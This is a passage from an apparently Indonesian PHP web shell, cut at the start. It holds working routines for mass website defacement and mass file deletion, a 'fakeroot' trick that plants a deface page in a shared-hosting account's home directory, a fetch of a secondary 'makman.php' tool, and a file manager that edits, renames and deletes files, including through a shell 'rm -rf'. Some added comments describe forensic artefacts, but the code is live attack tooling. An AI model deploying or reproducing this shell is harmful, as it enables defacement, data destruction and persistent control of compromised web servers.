if($_POST['mass_type'] === 'singledir') {
print "
";
massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file']);
print "
";
}
elseif($_POST['mass_type'] === 'alldir') {
print "
";
massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file'], "-alldir");
print "
";
}
elseif($_POST['mass_type'] === "delete") {
print "
";
massdelete($_POST['d_dir'], $_POST['d_file']);
print "
";
}
}
else {
print "

   Tipe Sabun:

   Mass Deface Single DirectoryMass Deface All DirectoryMass Delete File

   ( kosongkan 'Index File' jika memilih Mass Delete File )


   Folder:

  


   Filename:

  


   Index File:

  

  
  
";
}
}
// do=fakeroot: only proceeds when DOCUMENT_ROOT matches /home/<user>/public_html.
// It writes the posted content under the posted filename into both the document
// root and its parent directory, then requests <url>/~<user>/<file> for each posted
// site. Unexpected files in the account's home directory (outside the web root)
// are the artefact to look for.
elseif($_GET['do'] == 'fakeroot') {
ob_start();

$site = explode("\r\n", $_POST['url']);
$user = usergroup()->name;
$file = $_POST['file'];

if(!preg_match("#/home/$user/public_html#", $_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "I think this server not using shared host :("));


if($_POST['reverse']) {
if(!is_writable($_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "Directory '".$_SERVER['DOCUMENT_ROOT']."' is not writeable."));
if(!is_writable(dirname($_SERVER['DOCUMENT_ROOT']))) die(color(1, 1, "Directory '".dirname($_SERVER['DOCUMENT_ROOT'])."' is not writeable."));

save($_SERVER['DOCUMENT_ROOT']."/".$file, "w", $_POST['script']);
save(dirname($_SERVER['DOCUMENT_ROOT'])."/".$file, "w", $_POST['script']);

foreach($site as $url) {
$cek = curl("$url/~$user/$file");
if(preg_match("/hacked/i", $cek)) {
print "URL: $url/~$user/$file -> Fake Root!
";
}
}
} else {
print "

Filename:


User:


Domain:



Index File:






NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.
";
}
}
// do=lre: looks for "makman.php" in the working directory and otherwise asks
// getfile("LRE") to fetch it (getfile() is defined outside this excerpt). A file
// with that name next to the shell is a secondary artefact to collect and remove.
elseif($_GET['do'] === 'lre') {
if(file_exists("makman.php")) {
print "";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Makman'."));
if(getfile("LRE")) {
print "";
}
else {
print color(1, 1, "Error while downloading file makman.");
@unlink("makman.php");
}
}

}
}
// act=...: file-manager operations. Paths come from $_GET['file'] / path() and names
// from POST fields; htmlspecialchars() is the only transformation applied to them.
elseif(isset($_GET['act'])) {
// newfile: creates (or opens for append) the posted filename.
if($_GET['act'] === 'newfile') {
if($_POST['save']) {
$filename = htmlspecialchars($_POST['filename']);
$fopen    = fopen($filename, "a+");
if($fopen) {
$act = "";
}
else {
$act = color(1, 1, "Permission Denied!");
}
}
print $act;
print "

Filename:

";
}
// newfolder: mkdir() under the current path.
elseif($_GET['act'] === 'newfolder') {
if($_POST['save']) {
$foldername = path().'/'.htmlspecialchars($_POST['foldername']);
if(!@mkdir($foldername)) {
$act = color(1, 1, "Permission Denied!");
}
else {
$act = "";
}
}
print $act;
print "

Folder Name:

";
}
// rename_folder: renames the current directory within its parent.
elseif($_GET['act'] === 'rename_folder') {
if($_POST['save']) {
$rename_folder = rename(path(), "".dirname(path()).DIRECTORY_SEPARATOR.htmlspecialchars($_POST['foldername']));
if($rename_folder) {
$act = "";
}
else {
$act = color(1, 1, "Permission Denied!");
}
print "$act
";
}
print "



";
}
// delete_folder: rmdir(), then a recursive shell delete through exe() if that fails.
elseif($_GET['act'] === 'delete_folder') {
if(is_dir(path())) {
if(is_writable(path())) {
@rmdir(path());
if(!@rmdir(path()) AND OS() === "Linux") @exe("rm -rf ".path());
if(!@rmdir(path()) AND OS() === "Windows") @exe("rmdir /s /q ".path());
$act = "";
}
else {
$act = color(1, 1, "Could not remove directory '".basename(path())."'");
}
}
print $act;
}
// view: shows the name and permission string of $_GET['file'].
elseif($_GET['act'] === 'view') {
print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]
";
print "[ view ] [ edit ] [ rename ] [ download ] [ delete ]
";
print "";
}
// edit: overwrites $_GET['file'] with the posted content. Recently modified
// application files (changed mtime or hash) should be diffed against a clean copy.
elseif($_GET['act'] === 'edit') {
if($_POST['save']) {
$save = file_put_contents($_GET['file'], $_POST['src']);
if($save) {
$act = color(1, 2, "File Saved!");
}
else {
$act = color(1, 1, "Permission Denied!");
}
print "$act
";
}

print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]
";
print "[ view ] [ edit ] [ rename ] [ download ] [ delete ]
";
print "




";
}
// rename: moves $_GET['file'] to the posted name under the current path.
elseif($_GET['act'] === 'rename') {
if($_POST['save']) {
$rename = rename($_GET['file'], path().DIRECTORY_SEPARATOR.htmlspecialchars($_POST['filename']));
if($rename) {
$act = "";
}
else {
$act = color(1, 1, "Permission Denied!");
}
print "$act
";
}

print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]
";
print "[ view ] [ edit ] [ rename ] [ download ] [ delete ]
";
print "



";
}
// delete: unlink() on $_GET['file'].
elseif($_GET['act'] === 'delete') {
$delete = unlink($_GET['file']);
if($delete) {
$act = "";
}
else {
$act = color(1, 1, "Permission Denied!");
}
print $act;
}
}
// No do/act parameter: show the directory listing.
else {
files_and_folder();
}
}

// Script entry point: runs on every request that reaches this file.
// NOTE(review): serverinfo() is defined outside this excerpt (presumably prints host details; confirm).
serverinfo();
// Dispatches on the do/act request parameters; see action() above.
action();
?>


  

